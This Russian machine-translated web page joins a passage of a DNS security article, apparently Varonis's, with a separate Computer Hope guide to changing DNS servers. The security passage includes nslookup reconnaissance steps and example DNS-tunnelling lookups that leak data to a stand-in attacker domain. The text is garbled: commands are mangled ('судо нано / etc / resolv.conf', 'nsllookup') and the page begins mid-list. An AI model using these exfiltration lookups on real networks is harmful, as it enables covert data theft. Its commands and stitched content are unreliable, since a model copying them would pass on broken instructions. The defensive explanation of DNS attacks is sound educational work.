  6. На серверах имен TLD находится официальный сервер имен для запрашиваемого сайта. Официальный сервер имен отвечает IP-адресом для www.varonis.com, а рекурсивный DNS-сервер сохраняет его в локальном кэше DNS и возвращает адрес вашему компьютеру.
  7. Ваша местная служба DNS получает IP-адрес и подключается к www.varonis.com для загрузки всего великолепного контента. DNS затем записывает IP-адрес в локальный кеш со значением времени жизни (TTL). TTL — это время, в течение которого локальная запись DNS действительна, и после этого времени DNS снова выполнит процесс, когда вы запросите Varonis.com в следующий раз.

Какие типы DNS-запросов?

DNS-запросы — это компьютерный код, который сообщает DNS-серверам, что это за запрос и какую информацию он хочет получить. В стандартном поиске DNS есть три основных DNS-запроса.

  • Рекурсивный запрос: В рекурсивном запросе компьютер запрашивает IP-адрес или подтверждение того, что DNS-сервер не знает этот IP-адрес.
  • Итеративный запрос: Итеративный запрос, который запрашивающая сторона запрашивает у DNS-сервера лучший ответ, который у него есть.Если DNS-сервер не имеет IP-адреса, он вернет авторитетный сервер имен или сервер имен TLD. Запрашивающая сторона будет продолжать этот итеративный процесс до тех пор, пока не найдет ответ или не истечет время ожидания.
  • Нерекурсивный запрос: Преобразователь DNS будет использовать этот запрос для поиска IP-адреса, которого нет в его кэше. Они ограничены одним запросом на ограничение использования полосы пропускания сети.

Что такое DNS-кеш + функции кэширования

DNS cache — это хранилище доменных имен и IP-адресов, которые хранятся на компьютере, поэтому ему не нужно каждый раз запрашивать IP-адрес.Представьте, что каждый раз, когда какой-либо пользователь пытается перейти на www.varonis.com, DNS должен запрашивать авторитетный сервер имен в Varonis. Трафик будет огромным! Сама мысль о таком большом трафике — вот почему у нас есть кеширование DNS. Кэширование DNS преследует две основные цели:

  • Ускорить DNS-запросы
  • Уменьшить пропускную способность DNS-запросов в Интернете

Однако методология кеширования DNS имеет некоторые проблемы:

  • Изменениям DNS требуется время для распространения — это означает, что может пройти некоторое время, прежде чем каждый DNS-сервер обновит свой кеш до последних данных IP
  • DNS-кеш — потенциальный вектор атаки для хакеров

В Интернете используется несколько различных типов кэширования DNS:

  • Кэширование DNS в браузере: Текущие браузеры примерно на 2018 год имеют встроенную функцию кэширования DNS.Разрешение DNS с помощью локального кеша выполняется быстро и эффективно.
  • Операционная система (ОС) Кэширование DNS: Ваш компьютер является DNS-клиентом, и на вашем компьютере есть служба, которая управляет разрешением и запросами DNS. Этот DNS-кеш также является локальным и, следовательно, быстрым и не требует полосы пропускания.
  • Рекурсивное разрешение DNS-кеширования: Каждый DNS-рекурсор имеет DNS-кеш и хранит любой IP-адрес, который он знает, чтобы использовать для следующего запроса

Слабые стороны и уязвимости DNS

Существует три основных уязвимости DNS, на которые следует обратить внимание, которые злоумышленники часто используют для злоупотребления DNS:

  1. Внутренние DNS-серверы хранят все имена серверов и IP-адреса для своих доменов и будут делиться ими со всеми, кто их спросит. Это делает DNS отличным источником информации для злоумышленников, когда они пытаются провести внутреннюю разведку.
  2. Кеши DNS не являются «авторитетными», и ими можно манипулировать. Если ваш DNS-сервер «отравлен» плохими записями, компьютеры могут быть обмануты, и они попадут в плохие места.
  3. DNS передает информацию о запросах от внутренних рабочих станций к внешним серверам, и злоумышленники научились использовать это поведение для создания «скрытых каналов» для эксфильтрации данных.

Использовать DNS для разведки

Как только злоумышленник оказывается внутри брандмауэра и получает контроль над компьютером, он может использовать DNS для поиска важных имен серверов. Злоумышленники могут искать имена, связанные с внутренними IP-адресами — почтовые серверы, серверы имен — все виды ценных вещей. Если они достаточно сообразительны, они могут даже получить внутренний DNS-сервер для отправки большого количества информации о зонах их домена — это называется «атакой передачи зоны DNS».”

Если у вас компьютер Windows, выполните следующие команды как есть; если вы пользователь Linux, вы можете найти соответствующие команды.

  1. Откройте командную строку (введите Ctrl + esc, буквы «cmd» и введите).
  2. Тип ipconfig
  3. Вы увидите DNS-домен, в котором вы находитесь (DNS-суффикс для конкретного подключения), ваш IP-адрес и множество других вещей. Вы захотите вернуться к этому.
  4. Введите nslookup [ip-адрес] Вы увидите имя DNS-сервера, который отвечает, и, если имя известно, DNS-запись с указанием имени и IP-адреса.
  5. nslookup –type = soa [ваш домен] Эта команда возвращает ваш авторитетный DNS-сервер, это не поможет, если вы пытаетесь проникнуть в сеть.
  6. nslookup –type = MX [ваш домен] Эта команда возвращает все почтовые серверы в вашем локальном домене на случай, если вы хотите взломать почтовые серверы и не знаете, где они находятся.

Использовать DNS для перенаправления трафика

Помните, когда пользователь пытается перейти на веб-сайт, его компьютер запрашивает у своего DNS-сервера IP-адрес сайта или запись DNS.Если DNS-сервер имеет кэшированную копию записи, он отвечает. В противном случае он запрашивает «вышестоящий» DNS-сервер, передает результаты обратно конечному пользователю и кэширует их для следующего раза.

Злоумышленники нашли способ подделать ответы DNS или сделать так, чтобы ответы выглядели так, как будто они исходят от законных серверов DNS. Не вдаваясь в технические подробности, злоумышленники используют для этого три слабых места в DNS:

  1. DNS выполняет очень слабую проверку ответов, поступающих от вышестоящих серверов. Ответы просто должны содержать правильный идентификатор транзакции, который представляет собой всего лишь 16-битное число (0-65536). Оказывается, что вам не нужно столько людей в комнате, чтобы получить преимущество у двоих из них, имеющих один и тот же день рождения, оказывается, что угадать правильный идентификатор легче, чем вы думаете.
  2. DNS-серверы принимают одновременные (или почти одновременные) ответы на свои запросы , позволяя злоумышленникам делать несколько предположений об идентификаторе транзакции (что мало похоже на атаку грубой силы на пароль).
  3. IP-соединения, используемые DNS, легко «подделать». Это означает, что злоумышленник может отправить трафик на DNS-сервер с одного компьютера и сделать так, чтобы он выглядел так, как будто он идет с другого компьютера, например, с действующего DNS-сервера. Только определенные типы IP-соединений легко подделать — DNS является одним из них.

Если злоумышленник успешно подделывает ответ DNS, он может заставить принимающий DNS-сервер кэшировать зараженную запись. Так как это поможет злоумышленникам?

Вот пример. Допустим, злоумышленник узнает, что ваша организация использует внешнее приложение для чего-то важного, например для расходов.Если они отравляют DNS-сервер вашей организации так, что он отправляет каждого пользователя на сервер злоумышленника, все, что им нужно сделать, это создать законно выглядящую страницу входа, и пользователи будут вводить свои учетные данные. Они могут даже ретранслировать трафик на реальный сервер (действуя как «человек посередине»), чтобы никто не заметил. Затем злоумышленник может попробовать эти учетные данные в других системах, продать их или просто отпраздновать это злобным смехом.

Использование DNS в качестве скрытого канала

Допустим, злоумышленник сумел проникнуть в сеть (корп.com), скомпрометировали один или два хоста и обнаружили важные данные, которые они хотят эксфильтровать. Как они могут это сделать, не подавая никаких сигналов тревоги? Для этого злоумышленники используют метод, называемый «DNS-туннелирование». Они устанавливают DNS-домен (например, evil-domain.com) в Интернете и создают авторитетный сервер имен. Затем на взломанном хосте злоумышленник может использовать программу, которая разбивает данные на небольшие части и вставляет их в серию поисков, например:

  • nslookup My1secret1.evil-domain.com
  • nslookup is1that1I1know.evil-domain.com
  • nsllookup how2steal1data.evil-domain.com

DNS-сервер corp.com будет получать эти запросы, понимать, что результатов нет в его кеше, и ретранслировать эти запросы обратно на полномочный сервер имен evil-domain.com. Злоумышленник ожидает этот трафик, поэтому он запускает программу на полномочном сервере имен, чтобы извлечь первую часть запроса (все, что было до evil-domain.com) и собрать ее заново.Если организация не проверяет запросы своих DNS-серверов, они могут никогда не понять, что их DNS-серверы использовались для кражи данных.

DNS существует уже давно, и каждый компьютер, подключенный к Интернету, полагается на него. Злоумышленники теперь используют DNS как для внешней, так и для внутренней разведки, для перехвата трафика и создания скрытых каналов связи. К счастью, с помощью мониторинга DNS-серверов и применения аналитики безопасности многие из этих атак можно обнаружить и предотвратить.

Хотите увидеть, как? Присоединяйтесь к нашим семинарам по кибератакам в режиме реального времени, когда наши инженеры по безопасности проводят живую атаку — эксфильтруют данные через туннелирование DNS и просматривают все в режиме реального времени!

Как изменить DNS-адрес компьютера

Обновлено: 31.12.2020, Computer Hope

Что такое DNS?

DNS (служба доменных имен) действует как телефонная книга для интернет-адресов. Это сетевая компьютерная система с огромной базой данных доменных имен в Интернете и их соответствующих адресов, которая постоянно обновляется.

Когда вы делаете сетевой запрос к доменному имени, ваш компьютер должен знать, где в Интернете расположен этот домен. Он получает эту информацию из DNS. Ваш компьютер отправляет запрос в DNS, содержащий имя домена, и DNS отвечает числовым IP-адресом этого домена. После этого ваш компьютер подключится к этому адресу.

Процесс называется разрешением доменного имени : доменное имя разрешает в соответствующий ему адрес.

Ваш интернет-провайдер обычно предоставляет своим клиентам собственный DNS по умолчанию, и настройки для этого сервера автоматически настраиваются через DHCP. Но у вас нет , у вас нет для использования DNS вашего провайдера. Существует множество общедоступных служб доменных имен, и вы можете использовать одну из них. Помимо предоставления альтернативного решения вашему интернет-провайдеру, такие сервисы, как Cloudflare, также шифруют и сохраняют конфиденциальность ваших DNS-запросов от вашего интернет-провайдера.

Услуги альтернативного доменного имени

Вот список общедоступных DNS-серверов по состоянию на декабрь 2018 года.Для каждого указаны два адреса: первичный и вторичный , который действует как резервный, если первый адрес недоступен.

DNS-провайдер Основной адрес Дополнительный адрес
Cloudflare IPv4 1.1.1.1 1.0.0.1
Cloudflare IPv6 2606: 4700: 4700 :: 1111 2606: 4700: 4700 :: 1001
Google Public DNS 8.8.8.8 8.8.4.4
OpenDNS 208.67.222.222 208.67.220.220
Verisign 64.6.64.6 64.6.65.6
DNS.WATCH 84.200.69.80 84.200.70.40
OpenNIC 50.116.23.211 192.99.240.129
Dyn 216.146.35.35 216.146.36.36
Преимущества DNS 156.154.70.1 156.154.71.1
SafeDNS 195.46.39.39 195.46.39.40
Comodo Secure DNS 8.26.56.26 8.20.247.20
Norton ConnectSafe 199.85.126.10 199.85.127.10
GreenTeamDNS 81.218.119.11 209.88.198.133
SmartViper 208.76.50.50 208.76.51.51
Альтернативный DNS 198.101.242.72 23.253.163.53
Яндекс.DNS 77.88.8.8 77.88.8.1

Вы можете решить использовать один из них или изменить свой DNS на адрес, предоставленный вашим учебным заведением или ИТ-отделом вашего работодателя. Прежде чем продолжить, убедитесь, что вы знаете адрес (а) нового DNS.

Настройка операционной системы

Действия по изменению настроек DNS вашего компьютера будут зависеть от того, какая у вас операционная система.Воспользуйтесь ссылками ниже, чтобы перейти к разделу, который относится к вам.

Прежде чем вносить какие-либо изменения в конфигурацию DNS, мы настоятельно рекомендуем записать информацию о вашем текущем адресе DNS, чтобы при необходимости изменения можно было отменить.

Примечание

Если вы не можете изменить свои адреса DNS, скорее всего, у вас нет для этого необходимых разрешений. Если у вас возникли проблемы, обратитесь за помощью к системному администратору или в ИТ-отдел.

Ниже приведены пошаговые инструкции по изменению настроек DNS в операционных системах Windows, OS X, Linux и BSD:

Windows 10

  1. Откройте панель управления.
  2. Щелкните Просмотр состояния сети и задач
  3. Щелкните Изменить настройки адаптера в левой части окна.
  4. Дважды щелкните значок используемого подключения к Интернету.
  5. Нажмите кнопку Свойства .
  6. Щелкните и выделите Протокол Интернета версии 4 (TCP / IPv4) и щелкните Свойства .
  7. Если еще не выбрано, выберите опцию Использовать следующие адреса DNS-сервера .
  8. Введите новые адреса DNS, нажмите OK и закройте все остальные окна.

Windows 8

  1. Доступ к экрану рабочего стола Windows.
  2. Нажмите Ctrl + I на клавиатуре, чтобы открыть меню «Настройки » и выбрать опцию «Панель управления».
  3. Щелкните значок Центр управления сетями и общим доступом .
  4. Щелкните параметр Изменить параметры адаптера на левой панели навигации.
  5. Дважды щелкните значок используемого подключения к Интернету.Он может быть помечен как Ethernet при использовании проводного Интернета или Wi-Fi при использовании беспроводного подключения. Если у вас несколько подключений, убедитесь, что не выбрано то, что отмечено красным X. В открывшемся окне Properties или Status нажмите кнопку Properties .
  6. Выберите вариант Интернет-протокол версии 4 (TCP / IPv4) в списке элементов в окне «Свойства» и нажмите кнопку « Свойства ».
  7. Если еще не выбрано, выберите опцию Использовать следующие адреса DNS-сервера .
  8. Введите новые адреса DNS, нажмите OK и закройте все остальные окна.

Windows 7

  1. Откройте панель управления.
  2. Щелкните Просмотр состояния сети и задач
  3. Щелкните Изменить настройки адаптера в левой части окна.
  4. Дважды щелкните значок используемого подключения к Интернету.Часто это будет обозначено как Подключение по локальной сети или имя вашего интернет-провайдера. Если у вас несколько подключений, не нажимайте на то, что отмечено красным X.
  5. Нажмите кнопку Свойства .
  6. Щелкните и выделите Протокол Интернета версии 4 (TCP / IPv4) и щелкните Свойства .
  7. Если еще не выбрано, выберите опцию Использовать следующие адреса DNS-сервера .
  8. Введите новые адреса DNS, нажмите OK и закройте все остальные окна.

Windows Vista

  1. Откройте панель управления.
  2. Щелкните Просмотр состояния сети и задач
  3. Щелкните Просмотр состояния сетевого подключения.
  4. Щелкните Свойства и Продолжить .
  5. Щелкните и выделите Протокол Интернета версии 4 (TCP / IPv4) и щелкните Свойства .
  6. Если еще не выбрано, выберите опцию Использовать следующие адреса DNS-сервера .
  7. Введите новые адреса DNS, нажмите OK и закройте все остальные окна.

Windows XP

  1. Откройте панель управления.
  2. В окне панели управления дважды щелкните значок Сетевые подключения .
  3. Дважды щелкните значок используемого подключения к Интернету. Часто это будет обозначено как Подключение по локальной сети или имя вашего интернет-провайдера. Если у вас несколько подключений, не нажимайте на то, что отмечено красным крестиком.
  4. Нажмите кнопку «Свойства».
  5. Выделите Протокол Интернета (TCP / IP) в списке элементов подключения и нажмите кнопку «Свойства».
  6. Если еще не выбрано, выберите опцию Использовать следующие адреса DNS-сервера .
  7. Введите новые адреса DNS, нажмите OK и закройте все остальные окна.

Windows 98

  1. Откройте панель управления.
  2. В окне панели управления дважды щелкните значок сети .
  3. Выделите TCP / IP Ethernet-адаптер в списке элементов подключения и нажмите кнопку «Свойства».
  4. В окне «Свойства» перейдите на вкладку «Конфигурация DNS» и выберите Включить DNS .
  5. Если в списке присутствует какой-либо DNS-сервер, выделите его и нажмите кнопку «Удалить».
  6. Когда DNS не будет в списке, введите новые адреса и нажмите кнопку «Добавить».
  7. После добавления новых адресов нажмите ОК и закройте все остальные окна.

macOS

  1. В меню Apple в верхнем левом углу экрана выберите Системные настройки .
  2. В меню «Системные настройки» выберите Сеть .
  3. В меню «Сеть» убедитесь, что ваше правильное сетевое устройство выделено на левой панели окна, например, Wi-Fi . Щелкните Advanced .
  4. В расширенных настройках нажмите кнопку DNS , чтобы открыть настройки DNS.
  5. На левой панели вы можете увидеть ваши текущие адреса DNS-серверов. Запишите их на тот случай, если вам понадобится отменить изменения позже.
  6. Выделите один из ваших текущих адресов DNS и нажмите кнопку «минус» («») под левой панелью, чтобы удалить выделенный адрес из списка. Сделайте это для каждого из ваших текущих DNS-адресов.
  7. Когда список станет пустым, нажмите кнопку «плюс» (« + »), чтобы добавить новый пустой адрес ( 0.0.0.0 ).Выделите этот адрес и введите новый. Нажмите Введите , когда закончите.
  8. Повторите шаг 7 для вторичного адреса, если вы его добавляете.
  9. Нажмите ОК , чтобы сохранить настройки.
  10. Нажмите Применить , чтобы применить новые сетевые настройки.

Linux

В Linux адреса DNS-серверов хранятся в системном файле /etc/resolv.conf . (Для редактирования этого файла вам потребуются права суперпользователя.)

Например, чтобы отредактировать этот файл с помощью текстового редактора nano , используйте команду:

 судо нано / etc / resolv.conf 

(Мы префикс команды sudo для запуска nano с правами суперпользователя.)

В текстовом редакторе вы можете увидеть содержимое файла /etc/resolv.conf . Каждая строка, которая начинается со слова nameserver , содержит адрес DNS, который используется вашей системой.

После открытия файла выполните следующие действия:

  1. Запишите уже перечисленные адреса DNS. Эта информация может понадобиться вам позже, если вы захотите отменить свои изменения.
  2. Удалите все строки, начинающиеся с nameserver .
  3. Для каждого DNS-адреса, который вы хотите добавить, добавьте строку, которая читает nameserver address , где address — это адрес DNS. Например, на изображении ниже мы настраиваем нашу систему для использования первичного и вторичного общедоступных DNS Google.

  1. Сохраните файл. В nano это Ctrl-O , введите .
  2. Закройте текстовый редактор.В nano это Ctrl-X .

BSD

Решатель

BSD использует тот же файл и формат, что и Linux. Отредактируйте /etc/resolv.conf как root и добавьте строку nameserver address для каждого DNS, который вы хотите использовать.

То же самое верно и для macOS X, производной от BSD. Если вы хотите напрямую изменить DNS-адреса вашего Mac, отредактируйте строки nameserver в /etc/resolv.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *